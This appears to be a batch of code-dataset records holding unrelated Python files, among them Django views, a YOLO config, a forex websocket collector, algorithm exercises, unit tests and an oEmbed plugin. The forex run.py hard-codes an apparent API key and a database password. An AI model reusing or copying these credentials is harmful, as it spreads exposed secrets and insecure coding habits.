weapon_window(globals.main_window.app)\nglobals.main_window.msbuttons[5].when_clicked = show_weapon_window\nglobals.weapon_window.window.hide()\n\nsplash_window.update_load()\n\n# Spell Window\nglobals.spell_window = spell_window(globals.main_window.app)\nglobals.main_window.msbuttons[6].when_clicked = show_spell_window\nglobals.spell_window.window.hide()\n\nsplash_window.update_load()\n\n# Settings Window\nglobals.settings_window = settings_window(globals.main_window.app)\nglobals.main_window.msbuttons[7].when_clicked = show_settings_window\nglobals.settings_window.window.hide()\n\n# Update Window\nglobals.update_window = update_window(globals.main_window.app)\n\n# Selecting character sheet\nglobals.settings_window.load_window.show()\n\n# Deleting splash screen, freeing memory\nsplash_window.window.destroy()\n\n# Starting application\nglobals.main_window.app.display()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"245793414","text":"from django import http\nfrom django.views import generic\nfrom careers import models\n\n\n\ndef format_threshold(n):\n return (\"{0}−\" if n < 0 
else \"{0}+\").format(abs(n))\n\ndef gather_table(table):\n # hurrah for duck-typing\n return [(x.throw, x.content) for x in table.entries.all()]\n\n\n\nclass FrontView(generic.ListView):\n queryset = models.Career.objects.filter(active=True)\n template_name = \"careers/front.html\"\n\nclass DetailView(generic.DetailView):\n queryset = models.Career.objects.filter(active=True)\n template_name = \"careers/detail.html\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n career = context['object']\n if career.enlistment_special != \"soc10plus\":\n context['enlistment_throw'] = format_threshold(career.enlistment_throw)\n context['enlistment_stat1'] = career.get_enlistment_DM_1_stat_display()\n context['enlistment_if1'] = format_threshold(career.enlistment_DM_1_threshold)\n context['enlistment_stat2'] = career.get_enlistment_DM_2_stat_display()\n context['enlistment_if2'] = format_threshold(career.enlistment_DM_2_threshold)\n context['survival_throw'] = format_threshold(career.survival_throw)\n if career.survival_DM_2_stat:\n context['survival_stat2'] = career.get_survival_DM_2_stat_display()\n context['survival_if2'] = format_threshold(career.survival_DM_2_threshold)\n context['reenlistment'] = format_threshold(career.reenlist_throw)\n pdev = gather_table(career.personal_development_table)\n ssk = gather_table(career.service_skills_table)\n ed = gather_table(career.education_table)\n aed = gather_table(career.advanced_education_table)\n context['skills'] = [{\n 'throw': i + 1,\n 'pdev': pdev[i][1],\n 'ssk': ssk[i][1],\n 'ed': ed[i][1],\n 'aed': aed[i][1],\n } for i in range(6)]\n benefits = gather_table(career.benefits_table)\n cash = gather_table(career.cash_table)\n context['muster_out'] = [{\n 'throw': i + 1,\n 'benefit': benefits[i][1] if len(benefits) > i else \"\",\n 'cash': cash[i][1] if len(cash) > i else \"\",\n } for i in range(max(len(benefits), len(cash)))]\n try:\n rank_data = career.rankedcareer\n context['position_label'] = \"Commission\" if rank_data.military else \"Position\"\n context['position_throw'] = format_threshold(rank_data.position_throw)\n context['position_stat1'] = rank_data.get_position_DM_1_stat_display()\n context['position_if1'] = format_threshold(rank_data.position_DM_1_threshold)\n context['promotion_throw'] = format_threshold(rank_data.promotion_throw)\n context['promotion_stat1'] = rank_data.get_promotion_DM_1_stat_display()\n context['promotion_if1'] = format_threshold(rank_data.promotion_DM_1_threshold)\n context['ranks'] = [{\n 'value': x.value,\n 'title': x.title,\n } for x in rank_data.ranks.all()]\n context['rank_skills'] = [{\n 'title': x.title,\n 'skill': x.skill,\n } for x in rank_data.ranks.exclude(skill=None)]\n except models.RankedCareer.DoesNotExist:\n pass\n return context\n\nclass VersionDetailView(DetailView):\n def get_queryset(self):\n qs = models.Career.objects.filter(slug=self.kwargs['slug'],\n version=self.kwargs['version'])\n if qs.count() < 1:\n raise http.Http404\n return qs\n","sub_path":"careers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584085032","text":"import numpy as np\n\n# Yolo parameter\nyolo_anchors = np.array([(10, 13), (16, 30), (33, 23), (30, 61), (62, 45),\n (59, 119), (116, 90), (156, 198), (373, 326)],\n np.float32)\nyolo_anchor_masks = np.array([[6, 7, 8], [3, 4, 5], [0, 1, 2]])\nyolo_tiny_anchors = np.array([(10, 14), (23, 27), (37, 58),\n (81, 
82), (135, 169), (344, 319)],\n np.float32)\nyolo_tiny_anchor_masks = np.array([[3, 4, 5], [0, 1, 2]])\n\n# Yolo setting\nsize_h = 416\nsize_w = 416\n\n# Training setting\ntiny = False\nif tiny:\n step1_batch_size = 32\n step1_learning_rate = 1e-3\n step1_start_epochs = 0\n step1_end_epochs = 50\n step2_batch_size = 14\n step2_learning_rate = 1e-4\n step2_start_epochs = 50\n step2_end_epochs = 100\nelse:\n step1_batch_size = 32\n step1_learning_rate = 1e-3\n step1_start_epochs = 0\n step1_end_epochs = 100\n step2_batch_size = 8\n step2_learning_rate = 1e-4\n step2_start_epochs = step1_end_epochs\n step2_end_epochs = step1_end_epochs + 100\n\n# Pre-Train weights\nyolo_weights = 'model_data/yolo_weights.h5'\nyolo_tiny_weights = 'model_data/yolo_tiny_weights.h5'\n\n# Our Yolo weights\nyolo_voc_weights = 'logs_yolo/models/best_011.h5'\nyolo_coco_weights = 'logs_yolo/models/best_001.h5'\n\ncoco_classes = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',\n 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',\n 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',\n 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',\n 'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard',\n 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush']\nvoc_classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']","sub_path":"Lab12/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176574331","text":"import os\nimport sys\nimport asyncio\nimport nest_asyncio\nimport json\nfrom dotenv import load_dotenv\nfrom datetime import datetime\n\n# from wss.wss_binance import binance_async\nfrom wss.wss_12data import twelvedata_async\nfrom db.db_pool import get_pool\nfrom db.db_insert import insert2db\n\ndef subscribe_event(symbols):\n return {\n \"action\": \"subscribe\",\n \"params\": {\n \"symbols\": \",\".join(list(symbols))\n }\n }\n\n\ndef main() -> None:\n ###\n CURRENCY_PAIRS = ['AUD/USD', 'CAD/USD', 'CHF/USD', 'EUR/USD', 'GBP/USD', 'NZD/USD', 'USD/AUD', \n 'USD/CAD', 'USD/CHF', 'USD/EUR', 'USD/GBP', 'USD/JPY', 'USD/NZD', 'AUD/CAD', 'AUD/CHF', \n 'AUD/EUR', 'AUD/GBP', 'AUD/JPY', 'AUD/NZD', 'CAD/AUD', 'CAD/CHF', \n 'CAD/COP', 'CAD/EUR', 'CAD/GBP', 'CAD/JPY', 'CAD/NZD', 'CHF/AUD', 'CHF/CAD', 'CHF/EUR', \n 'CHF/GBP', 'CHF/JPY', 'CHF/NZD', 'EUR/AOA', 'EUR/AUD', 'EUR/CAD', 'EUR/CHF', \n 'EUR/GBP', 'EUR/JPY', 'EUR/NZD', 'GBP/AUD', 'GBP/CAD', 'GBP/CHF', \n 'GBP/EUR', 'GBP/JPY', 'GBP/NZD', 'JPY/CHF', 'NZD/AUD', 'NZD/CAD', 'NZD/CHF', 'NZD/EUR',\n 'NZD/GBP', 'NZD/JPY', 'USD/RUB', 'CZK/PLN'\n ] # Use this one for hourly & minutes - removed 'BHD/INR', 'USD/AOA' due to small datasets. 
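\r\n # Illustrative payload for a two-symbol run, as produced by subscribe_event() above\r\n # (the symbols are arbitrary): {\"action\": \"subscribe\", \"params\": {\"symbols\": \"AUD/USD,CAD/USD\"}}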
\n # Needs to remove 'CAD/COP', 'EUR/AOA', 'CZK/PLN' as well due to no where to download historical tick data\n\n symbols = CURRENCY_PAIRS # ['AUD/USD', 'CAD/USD']\n\n ###\n # load_dotenv()\n\n subscribe = json.dumps(subscribe_event(symbols))\n print(datetime.utcnow(), ': Subscribe:', subscribe)\n\n ###\n # socket = f\"wss://stream.binance.com:9443/ws/{pair}@aggTrade\"\n socket = f\"wss://ws.twelvedata.com/v1/quotes/price?apikey=7b742df1fccc4f428fa53aef377c05ab\"\n ###\n\n # PGPASSWORD = os.environ.get(\"PGPASSWORD\")\n # PGHOST = os.environ.get(\"PGHOST\")\n # print(PGPASSWORD, PGHOST)\n\n dsn = f\"postgres://postgres:st0plessA!@localhost:5432/market_data\"\n table = f'ticks'\n\n while True:\n pool = get_pool(dsn, asyncio.get_event_loop())\n insert2db_async = lambda msg: insert2db(msg, \n pool=pool, \n table=table)\n \n asyncio.get_event_loop().run_until_complete(\n twelvedata_async(socket=socket, \n subscribe=subscribe,\n insert2db=insert2db_async)\n )\n asyncio.get_event_loop().run_until_complete(pool.close())\n\nif __name__ == \"__main__\":\n main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127192333","text":"'''\n1. You are given a number n, representing the number of rows.\n2. You are given a number m, representing the number of columns.\n3. You are given n*m numbers, representing elements of 2d array a, which represents a gold mine.\n4. You are allowed to take one step left, right, up or down from your current position.\n5. You can't visit a cell with 0 gold and the same cell more than once. \n6. Each cell has a value that is the amount of gold available in the cell.\n7. You are required to identify the maximum amount of gold that can be dug out from the mine if \n you start and stop collecting gold from any position in the grid that has some gold.\n \n \nSample Input:\n\n6\n6\n\n0 1 4 2 8 2\n4 3 6 5 0 4\n1 2 4 1 4 6\n2 0 7 3 2 2\n3 1 5 9 2 4\n2 7 0 8 5 1\n\nSample Output:\n\n120\n\nhttps://www.youtube.com/watch?v=lNwXq3Ki32I&list=PL-Jc9J83PIiHO9SQ6lxGuDsZNt2mkHEn0&index=7\n\n\n'''\n\ndef travelAndCollect(arr, i, j, visited, bag):\n \n if(i < 0 or j < 0 or i >= len(arr) or j >= len(arr[0]) or arr[i][j] == 0 or visited[i][j] == True):\n return\n \n visited[i][j] = True\n bag.append(arr[i][j])\n travelAndCollect(arr, i-1, j, visited, bag) # call for north\n travelAndCollect(arr, i, j+1, visited, bag) # call for east\n travelAndCollect(arr, i+1, j, visited, bag) # call for south\n travelAndCollect(arr, i, j-1, visited, bag) # call for west\n \n \ndef getMaxGold(arr):\n \n maxx = 0\n \n visited = [[False for j in range(len(arr))] for i in range(len(arr))]\n \n for i in range(len(arr)):\n for j in range(len(arr[0])):\n if(visited[i][j] == False and arr[i][j] != 0):\n bag = []\n travelAndCollect(arr, i, j, visited, bag)\n \n # take count of all visited cells\n summ = 0\n for val in bag:\n summ += val\n\n if(summ > maxx):\n maxx = summ\n \n return maxx\n\narr = [ \n [0, 1, 4, 2, 8, 2],\n [4, 3, 6, 5, 0, 4],\n [1, 2, 4, 1, 4, 6],\n [2, 0, 7, 3, 2, 2],\n [3, 1, 5, 9, 2, 4],\n [2, 7, 0, 8, 5, 1]\n ]\n\nprint(getMaxGold(arr))","sub_path":"pepcoding/backtracking/5_Gold_Mine_2.py","file_name":"5_Gold_Mine_2.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615777191","text":"#!/usr/bin/python3\n\"\"\"\nPrints the State object with the name passed as 
argument\nfrom the database hbtn_0e_6_usa.\n\"\"\"\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n\n Session = sessionmaker(engine)\n session = Session()\n\n adding_state = State(name=\"Louisiana\")\n query = session.add(adding_state)\n session.commit()\n print(adding_state.id)\n\n session.close()\n","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"477148372","text":"# ------------------------------------------------------------------------------------------------ #\n# MIT License #\n# #\n# Copyright (c) 2020, Microsoft Corporation #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software #\n# and associated documentation files (the \"Software\"), to deal in the Software without #\n# restriction, including without limitation the rights to use, copy, modify, merge, publish, #\n# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the #\n# Software is furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in all copies or #\n# substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING #\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, #\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
#\n# ------------------------------------------------------------------------------------------------ #\n\nfrom functools import partial\n\nimport jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nfrom .._base.test_case import TestCase\nfrom ..utils import get_transition_batch, safe_sample\nfrom .v import V\n\n\ndef func(S, is_training):\n rng1, rng2, rng3 = hk.next_rng_keys(3)\n rate = 0.25 if is_training else 0.\n batch_norm = hk.BatchNorm(False, False, 0.99)\n seq = hk.Sequential((\n hk.Flatten(),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng1, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng2, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(8), jax.nn.relu,\n partial(hk.dropout, rng3, rate),\n partial(batch_norm, is_training=is_training),\n hk.Linear(1, w_init=jnp.zeros), jnp.ravel,\n ))\n return seq(S)\n\n\nclass TestV(TestCase):\n\n def setUp(self):\n self.v = V(func, self.env_discrete, random_seed=13)\n self.transition_batch = get_transition_batch(self.env_discrete, random_seed=7)\n\n def tearDown(self):\n del self.v, self.transition_batch\n\n def test_call(self):\n s = safe_sample(self.env_discrete.observation_space)\n v = self.v(s)\n self.assertAlmostEqual(v, 0.)\n\n def test_soft_update(self):\n tau = 0.13\n v = self.v\n v_targ = v.copy()\n v.params = jax.tree_map(jnp.ones_like, v.params)\n v_targ.params = jax.tree_map(jnp.zeros_like, v.params)\n expected = jax.tree_map(lambda a: jnp.full_like(a, tau), v.params)\n v_targ.soft_update(v, tau=tau)\n self.assertPytreeAlmostEqual(v_targ.params, expected)\n\n def test_function_state(self):\n print(self.v.function_state)\n batch_norm_avg = self.v.function_state['batch_norm/~/mean_ema']['average']\n self.assertArrayShape(batch_norm_avg, (1, 8))\n self.assertArrayNotEqual(batch_norm_avg, jnp.zeros_like(batch_norm_avg))\n\n def test_bad_input_signature(self):\n def badfunc(S, is_training, x):\n pass\n msg = (\n r\"func has bad signature; \"\n r\"expected: func\\(S, is_training\\), got: func\\(S, is_training, x\\)\")\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_type(self):\n def badfunc(S, is_training):\n return 'garbage'\n msg = r\"(?:is not a valid JAX type|func has bad return type)\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_shape(self):\n def badfunc(S, is_training):\n V = func(S, is_training)\n return jnp.expand_dims(V, axis=-1)\n msg = r\"func has bad return shape, expected: \\(1,\\), got: \\(1, 1\\)\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n\n def test_bad_output_dtype(self):\n def badfunc(S, is_training):\n V = func(S, is_training)\n return V.astype('int32')\n msg = r\"func has bad return dtype; expected a subdtype of jnp\\.floating, got dtype=int32\"\n with self.assertRaisesRegex(TypeError, msg):\n V(badfunc, self.env_discrete, random_seed=13)\n","sub_path":"coax/_core/v_test.py","file_name":"v_test.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"20307627","text":"\"\"\"\nUses the Noembed_ oEmbed service to embed (almost) arbitrary URLs.\n\nDepends on requests_.\n\"\"\"\n\nfrom hashlib import md5\n\nfrom django import forms\nfrom django.core.cache import cache\nfrom django.db import models\nfrom django.utils.html import mark_safe\nfrom 
django.utils.translation import ugettext, ugettext_lazy as _\n\nimport requests\nfrom content_editor.admin import ContentEditorInline\n\n\n__all__ = ('External', 'ExternalInline', 'oembed_html', 'render_external')\n\n\ndef oembed_html(url, cache_failures=True):\n \"\"\"\n Asks Noembed_ for the embedding HTML code for arbitrary URLs. Sites\n supported include Youtube, Vimeo, Twitter and many others.\n\n Successful embeds are always cached for 30 days.\n\n Failures are cached if ``cache_failures`` is ``True`` (the default). The\n durations are as follows:\n\n - Connection errors are cached 60 seconds with the hope that the connection\n failure is only transient.\n - HTTP errors codes and responses in an unexpected format (no JSON) are\n cached for 24 hours.\n\n The return value is always either a HTML fragment or an empty string.\n \"\"\"\n # Thundering herd problem etc...\n key = 'oembed-url-%s' % md5(url.encode('utf-8')).hexdigest()\n html = cache.get(key)\n if html is not None:\n return html\n\n try:\n html = requests.get(\n 'https://noembed.com/embed',\n params={\n 'url': url,\n 'nowrap': 'on',\n 'maxwidth': 1200,\n 'maxheight': 800,\n },\n timeout=2,\n ).json().get('html', '')\n except (requests.ConnectionError, requests.ReadTimeout):\n # Connection failed? Hopefully temporary, try again soon.\n if cache_failures:\n cache.set(key, '', timeout=60)\n return ''\n except (ValueError, requests.HTTPError):\n # Oof... HTTP error code, or no JSON? Try again tomorrow,\n # and we should really log this.\n if cache_failures:\n cache.set(key, '', timeout=86400)\n return ''\n else:\n # Perfect, cache for 30 days\n cache.set(key, html, timeout=30 * 86400)\n return html\n\n\ndef render_external(plugin, **kwargs):\n \"\"\"\n Render the plugin, embedding it in the appropriate markup for Foundation's\n flex-video element (http://foundation.zurb.com/sites/docs/flex-video.html)\n \"\"\"\n\n html = oembed_html(plugin.url)\n if 'youtube.com' in html:\n return mark_safe(\n '
<div class=\"flex-video widescreen\">{}</div>
'.format(html))\n if 'vimeo.com' in html:\n return mark_safe(\n '
<div class=\"flex-video widescreen vimeo\">{}</div>
'.format(html))\n return mark_safe(html)\n\n\nclass External(models.Model):\n \"\"\"\n External content plugin\n \"\"\"\n url = models.URLField(_('URL'))\n\n class Meta:\n abstract = True\n verbose_name = _('external content')\n\n def __str__(self):\n return self.url\n\n\nclass ExternalForm(forms.ModelForm):\n \"\"\"\n Tries fetching the oEmbed code for the given URL when cleaning form data\n \"\"\"\n def clean(self):\n data = super(ExternalForm, self).clean()\n url = data.get('url')\n if url and not oembed_html(url, cache_failures=False):\n raise forms.ValidationError(\n ugettext('Unable to fetch HTML for this URL, sorry!')\n )\n return data\n\n\nclass ExternalInline(ContentEditorInline):\n \"\"\"\n Content editor inline using the ``ExternalForm`` to verify whether the\n given URL is embeddable using oEmbed or not.\n \"\"\"\n form = ExternalForm\n","sub_path":"feincms3/plugins/external.py","file_name":"external.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"154740947","text":"# @Time : 2021/6/21 14:58\n# @Author : WZG\n# --coding:utf-8--\n\n# 添加节点与邻居\ngraph = {}\ngraph[\"start\"] = {}\ngraph[\"start\"][\"a\"] = 5\ngraph[\"start\"][\"b\"] = 2\n\ngraph[\"a\"] = {}\ngraph[\"a\"][\"c\"] = 4\ngraph[\"a\"][\"d\"] = 2\n\ngraph[\"b\"] = {}\ngraph[\"b\"][\"a\"] = 8\ngraph[\"b\"][\"d\"] = 7\n\ngraph[\"c\"] = {}\ngraph[\"c\"][\"d\"] = 6\ngraph[\"c\"][\"fin\"] = 3\n\ngraph[\"d\"] = {}\ngraph[\"d\"][\"fin\"] = 1\n\ngraph[\"fin\"] = {}\n\n# 添加散列表来存储每个节点的开销。\ninfinity = float(\"inf\")\ncosts = {}\ncosts[\"a\"] = 5\ncosts[\"b\"] = 2\ncosts[\"c\"] = infinity\ncosts[\"d\"] = infinity\ncosts[\"fin\"] = infinity\n\n\n# 存储父节点的散列表\nparents = {}\nparents[\"a\"] = \"start\"\nparents[\"b\"] = \"start\"\nparents[\"c\"] = None\nparents[\"d\"] = None\nparents[\"fin\"] = None\n\n# 数组存储处理过的节点\nprocessed = []\n\n\ndef fin_lowest_cost_node(costs):\n lowest_cost = float(\"inf\")\n lowest_cost_node = None\n for node in costs: # 遍历所有的节点\n cost = costs[node]\n if cost < lowest_cost and node not in processed: # 如果当前节点的开销更低且未处理过,\n lowest_cost = cost # 就将其视为开销最低的节点\n lowest_cost_node = node\n return lowest_cost_node\n\n\nnode = fin_lowest_cost_node(costs) # 在未处理的节点中找出开销最小的节点\nwhile node is not None: # 这个while循环在所有节点都被处理过后结束\n cost = costs[node]\n neighbors = graph[node]\n for n in neighbors.keys(): # 遍历当前节点的所有邻居\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost: # 如果经当前节点前往该邻居更近,\n costs[n] = new_cost # 就更新该邻居的开销\n parents[n] = node # 同时将该邻居的父节点设置为当前节点\n\n processed.append(node) # 将当前节点标记为处理过\n node = fin_lowest_cost_node(costs) # 找出接下来要处理的节点,并循环\n\nlujing = []\nx = 'fin'\nwhile x:\n try:\n lujing.append(x)\n x = parents[x]\n except:\n break\n\n\nprint('最优路径为:', lujing[::-1])\nprint('最小开销为:', costs[\"fin\"])\n","sub_path":"算法/狄克斯特拉算法2.py","file_name":"狄克斯特拉算法2.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276276021","text":"import numpy as np\nfrom sklearn import cluster, metrics\n\nimport csv, sys\n\n\ndef main():\n n_clusters = int(sys.argv[1]) if len(sys.argv) > 1 else 3\n trunc_misses = int(sys.argv[2]) if len(sys.argv) > 2 else 5\n\n # alg = cluster.AffinityPropagation()\n alg = cluster.KMeans(n_clusters=n_clusters, init=\"random\")\n # alg = cluster.DBSCAN(eps=7, min_samples=3)\n # alg = cluster.SpectralClustering(n_clusters=n_clusters)\n # alg = cluster.MeanShift(bandwidth=6.9)\n\n 
dump_groups(*make_groups(sys.stdin, alg), trunc_misses)\n\n\ndef dump_groups(groups, get_topics_in_common, trunc_misses=5):\n for group_name, trainees in groups.items():\n print_group(trainees, group_name, get_topics_in_common(trainees), trunc_misses)\n\n\ndef make_groups(stream, alg):\n reader = csv.reader(stream)\n names = []\n missed_topics = []\n\n keywords = reader.__next__()[1:]\n for row in reader:\n row = iter(row)\n names.append(row.__next__())\n missed_topics.append(\n [1 if cell == \"x\" else 0 for cell in row if cell == \"x\" or cell == \"\"]\n )\n\n features = np.array(missed_topics)\n\n clustering = alg.fit(features)\n labels = clustering.labels_\n\n groups = group(labels, names)\n\n def get_topics_in_common(trainees):\n d = {}\n\n for trainee in trainees:\n missed = missed_topics[names.index(trainee)]\n for i, was_missed in enumerate(missed):\n d.setdefault(i, []).append(was_missed)\n\n return [\n (keywords[i], list)\n for i, list in sorted(\n d.items(), key=lambda kv: (-1 * sum(kv[1]), keywords[kv[0]])\n )\n ]\n\n return groups, get_topics_in_common\n\n\ndef print_group(members, group_name, topic_misses=None, trunc_misses=5):\n print(\"## {}\\n\".format(group_name))\n\n for member in members:\n print(\"- {}\".format(member))\n\n if topic_misses is not None:\n print(\"\\n\\n### Topics in common\\n\")\n\n if trunc_misses is not None:\n topic_misses = topic_misses[:trunc_misses]\n\n for topic, misses in topic_misses:\n print(\n \"- **{}**: {} / {} missed (%{})\".format(\n topic,\n sum(misses),\n len(misses),\n round((sum(misses) / len(misses)) * 100),\n )\n )\n\n print(\"\\n\")\n\n\ndef group(labels, names):\n groups = {label: [] for label in set(labels)}\n for i, label in enumerate(labels):\n groups[label].append(names[i])\n\n groups = {\n \"Group {}\".format(i + 1): names\n for i, names in enumerate([names for label, names in groups.items()])\n }\n\n return groups\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"analysis/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436486918","text":"import unittest\nfrom random import shuffle\n\nfrom torrent import *\nfrom hashlib import sha1, md5\n\n\nclass BencodeTest(unittest.TestCase):\n \"\"\"\n Unit Tests for the Bencode class\n \"\"\"\n\n def test_encode_string(self):\n string = Bencode.encode('hello world!')\n self.assertEqual(string, b'12:hello world!')\n string = Bencode.encode('')\n self.assertEqual(string, b'0:')\n string = Bencode.encode('Cyber')\n self.assertEqual(string, b'5:Cyber')\n\n def test_decode_string(self):\n string = Bencode.decode(b'12:hello world!')\n self.assertEqual(string, 'hello world!')\n string = Bencode.decode(b'0:')\n self.assertEqual(string, '')\n string = Bencode.decode(b'5:Cyber')\n self.assertEqual(string, 'Cyber')\n\n def test_encode_int(self):\n integer = Bencode.encode(13)\n self.assertEqual(integer, b'i13e')\n integer = Bencode.encode(-1523)\n self.assertEqual(integer, b'i-1523e')\n integer = Bencode.encode(0)\n self.assertEqual(integer, b'i0e')\n\n def test_decode_int(self):\n integer = Bencode.decode(b'i13e')\n self.assertEqual(integer, 13)\n integer = Bencode.decode(b'i-1523e')\n self.assertEqual(integer, -1523)\n integer = Bencode.decode(b'i0e')\n self.assertEqual(integer, 0)\n\n def test_encode_list(self):\n lst = Bencode.encode(['hello world!', 13])\n self.assertEqual(lst, b'l12:hello world!i13ee')\n lst = Bencode.encode([])\n 
self.assertEqual(lst, b'le')\n lst = Bencode.encode(['Cyber', -1523])\n self.assertEqual(lst, b'l5:Cyberi-1523ee')\n\n def test_decode_list(self):\n lst = Bencode.decode(b'l12:hello world!i13ee')\n self.assertListEqual(lst, ['hello world!', 13])\n lst = Bencode.decode(b'le')\n self.assertListEqual(lst, [])\n lst = Bencode.decode(b'l5:Cyberi-1523ee')\n self.assertListEqual(lst, ['Cyber', -1523])\n\n def test_encode_dict(self):\n d = Bencode.encode({'hello world!': 13, 'Cyber': [-1523, ''], '13': {}})\n self.assertEqual(d, b'd2:13de5:Cyberli-1523e0:e12:hello world!i13ee')\n d = Bencode.encode({})\n self.assertEqual(d, b'de')\n\n def test_decode_dict(self):\n d = Bencode.decode(b'd2:13de5:Cyberli-1523e0:e12:hello world!i13ee')\n self.assertDictEqual(d, {'hello world!': 13, 'Cyber': [-1523, ''], '13': {}})\n d = Bencode.decode(b'de')\n self.assertDictEqual(d, {})\n\n\nclass BitfieldTest(unittest.TestCase):\n \"\"\"\n Unit Tests for the bitfield class\n \"\"\"\n\n def test_length(self):\n bitfield = BitField(8)\n self.assertEqual(len(bitfield), 1)\n bitfield = BitField(250)\n self.assertEqual(len(bitfield), 32)\n\n def test_addition(self):\n bitfield = BitField(15)\n bitfield += 14\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0x0002)\n bitfield += 1\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0x4002)\n bitfield += 0\n self.assertEqual(int.from_bytes(bitfield, 'big'), 0xC002)\n\n\nclass PieceTest(unittest.TestCase):\n def setUp(self):\n self.piece = Piece(7, sha1(b'Torrent').digest())\n\n def test_addition(self):\n sliced = [(0, b'To'), (2, b'rr'), (4, b'ent')]\n shuffle(sliced)\n while sliced:\n self.piece += sliced.pop()\n self.assertTrue(self.piece)\n\n\nunittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183240439","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
